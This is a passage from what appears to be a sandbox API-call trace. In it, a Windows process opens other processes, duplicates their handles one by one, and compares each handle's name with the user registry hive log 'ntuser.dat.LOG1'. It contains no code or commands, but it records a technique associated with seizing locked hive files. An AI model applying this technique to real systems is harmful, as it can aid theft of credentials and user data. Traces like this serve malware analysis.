_Str2="\\ntuser.dat.LOG1") returned -13 [0151.784] CloseHandle (hObject=0x680) returned 1 [0151.784] CloseHandle (hObject=0x62c) returned 1 [0151.784] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.784] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.784] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.784] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.785] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.785] CloseHandle (hObject=0x670) returned 1 [0151.785] _wcsicmp (_Str1="\\$ObjId", _Str2="\\ntuser.dat.LOG1") returned -74 [0151.785] CloseHandle (hObject=0x680) returned 1 [0151.785] CloseHandle (hObject=0x62c) returned 1 [0151.785] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.785] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x45c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.785] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.787] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.788] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.788] CloseHandle (hObject=0x670) returned 1 [0151.788] CloseHandle (hObject=0x680) returned 1 [0151.788] CloseHandle (hObject=0x62c) returned 1 [0151.788] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.788] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x468, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.788] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.789] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.790] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.790] CloseHandle (hObject=0x670) returned 1 [0151.790] _wcsicmp (_Str1="\\tracking.log", _Str2="\\ntuser.dat.LOG1") returned 6 [0151.790] CloseHandle (hObject=0x680) returned 1 [0151.790] CloseHandle (hObject=0x62c) returned 1 [0151.790] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.790] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x46c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.790] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.791] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.791] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.792] CloseHandle (hObject=0x670) returned 1 [0151.792] _wcsicmp (_Str1="\\trkwks", _Str2="\\ntuser.dat.LOG1") returned 6 [0151.792] CloseHandle (hObject=0x680) returned 1 [0151.792] CloseHandle (hObject=0x62c) returned 1 [0151.792] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.792] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x470, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.792] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.792] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.793] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.793] CloseHandle (hObject=0x670) returned 1 [0151.793] _wcsicmp (_Str1="\\trkwks", _Str2="\\ntuser.dat.LOG1") returned 6 [0151.793] CloseHandle (hObject=0x680) returned 1 [0151.793] CloseHandle (hObject=0x62c) returned 1 [0151.793] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.793] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.793] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.795] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.796] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.796] CloseHandle (hObject=0x670) returned 1 [0151.796] _wcsicmp (_Str1="\\trkwks", _Str2="\\ntuser.dat.LOG1") returned 6 [0151.796] CloseHandle (hObject=0x680) returned 1 [0151.796] CloseHandle (hObject=0x62c) returned 1 [0151.796] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.796] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.796] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.797] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.798] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.798] CloseHandle (hObject=0x670) returned 1 [0151.798] CloseHandle (hObject=0x680) returned 1 [0151.798] CloseHandle (hObject=0x62c) returned 1 [0151.798] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.798] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x584, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.798] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.799] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.800] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.800] CloseHandle (hObject=0x670) returned 1 [0151.800] CloseHandle (hObject=0x680) returned 1 [0151.801] CloseHandle (hObject=0x62c) returned 1 [0151.801] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.801] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x660, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.801] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.801] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.802] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.803] CloseHandle (hObject=0x670) returned 1 [0151.803] CloseHandle (hObject=0x680) returned 1 [0151.803] CloseHandle (hObject=0x62c) returned 1 [0151.803] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.803] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.803] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.803] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.804] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.804] CloseHandle (hObject=0x670) returned 1 [0151.804] _wcsicmp (_Str1="\\sysmain.dll.mui", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.804] CloseHandle (hObject=0x680) returned 1 [0151.804] CloseHandle (hObject=0x62c) returned 1 [0151.804] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.804] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x700, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.805] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.805] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.806] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.806] CloseHandle (hObject=0x670) returned 1 [0151.806] CloseHandle (hObject=0x680) returned 1 [0151.806] CloseHandle (hObject=0x62c) returned 1 [0151.806] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.806] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.806] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.807] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.807] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.808] CloseHandle (hObject=0x670) returned 1 [0151.808] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.808] CloseHandle (hObject=0x680) returned 1 [0151.808] CloseHandle (hObject=0x62c) returned 1 [0151.808] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.808] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.808] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.808] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.809] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.809] CloseHandle (hObject=0x670) returned 1 [0151.809] CloseHandle (hObject=0x680) returned 1 [0151.809] CloseHandle (hObject=0x62c) returned 1 [0151.810] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.810] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.810] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.810] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.811] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.811] CloseHandle (hObject=0x670) returned 1 [0151.811] CloseHandle (hObject=0x680) returned 1 [0151.811] CloseHandle (hObject=0x62c) returned 1 [0151.811] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.811] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.811] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.812] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.817] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.817] CloseHandle (hObject=0x670) returned 1 [0151.817] CloseHandle (hObject=0x680) returned 1 [0151.817] CloseHandle (hObject=0x62c) returned 1 [0151.817] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.817] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.817] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.818] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.818] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.818] CloseHandle (hObject=0x670) returned 1 [0151.819] _wcsicmp (_Str1="\\tmp.edb", _Str2="\\ntuser.dat.LOG1") returned 6 [0151.819] CloseHandle (hObject=0x680) returned 1 [0151.819] CloseHandle (hObject=0x62c) returned 1 [0151.819] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.819] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x480, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.819] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.820] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.821] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.821] CloseHandle (hObject=0x670) returned 1 [0151.821] _wcsicmp (_Str1="\\SCHEDLGU.TXT", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.821] CloseHandle (hObject=0x680) returned 1 [0151.821] CloseHandle (hObject=0x62c) returned 1 [0151.821] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.821] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x498, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.821] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.822] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.822] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.823] CloseHandle (hObject=0x670) returned 1 [0151.823] CloseHandle (hObject=0x680) returned 1 [0151.823] CloseHandle (hObject=0x62c) returned 1 [0151.823] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.823] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x49c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.824] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.824] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.824] CloseHandle (hObject=0x670) returned 1 [0151.824] _wcsicmp (_Str1="\\atsvc", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.824] CloseHandle (hObject=0x680) returned 1 [0151.825] CloseHandle (hObject=0x62c) returned 1 [0151.825] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.825] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.825] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.826] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.826] CloseHandle (hObject=0x670) returned 1 [0151.826] _wcsicmp (_Str1="\\Tasks", _Str2="\\ntuser.dat.LOG1") returned 6 [0151.826] CloseHandle (hObject=0x680) returned 1 [0151.826] CloseHandle (hObject=0x62c) returned 1 [0151.826] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.826] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.826] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.827] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.827] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.827] CloseHandle (hObject=0x670) returned 1 [0151.828] _wcsicmp (_Str1="\\atsvc", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.828] CloseHandle (hObject=0x680) returned 1 [0151.828] CloseHandle (hObject=0x62c) returned 1 [0151.828] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.828] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.828] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.828] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.829] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.829] CloseHandle (hObject=0x670) returned 1 [0151.829] _wcsicmp (_Str1="\\atsvc", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.829] CloseHandle (hObject=0x680) returned 1 [0151.829] CloseHandle (hObject=0x62c) returned 1 [0151.829] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.829] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.829] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.830] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.831] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.831] CloseHandle (hObject=0x670) returned 1 [0151.831] CloseHandle (hObject=0x680) returned 1 [0151.831] CloseHandle (hObject=0x62c) returned 1 [0151.831] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.831] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.831] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.832] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.832] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.832] CloseHandle (hObject=0x670) returned 1 [0151.833] CloseHandle (hObject=0x680) returned 1 [0151.833] CloseHandle (hObject=0x62c) returned 1 [0151.833] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.833] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.833] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.833] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.834] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.834] CloseHandle (hObject=0x670) returned 1 [0151.835] _wcsicmp (_Str1="\\CatalogChangeListener-370-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.835] CloseHandle (hObject=0x680) returned 1 [0151.835] CloseHandle (hObject=0x62c) returned 1 [0151.835] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.835] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.835] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.836] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.836] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.836] CloseHandle (hObject=0x670) returned 1 [0151.836] CloseHandle (hObject=0x680) returned 1 [0151.836] CloseHandle (hObject=0x62c) returned 1 [0151.836] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.837] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.843] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.843] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.843] CloseHandle (hObject=0x670) returned 1 [0151.844] CloseHandle (hObject=0x680) returned 1 [0151.844] CloseHandle (hObject=0x62c) returned 1 [0151.844] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.844] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x520, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.844] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.844] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.845] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.845] CloseHandle (hObject=0x670) returned 1 [0151.845] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.845] CloseHandle (hObject=0x680) returned 1 [0151.845] CloseHandle (hObject=0x62c) returned 1 [0151.845] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.845] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5f0, 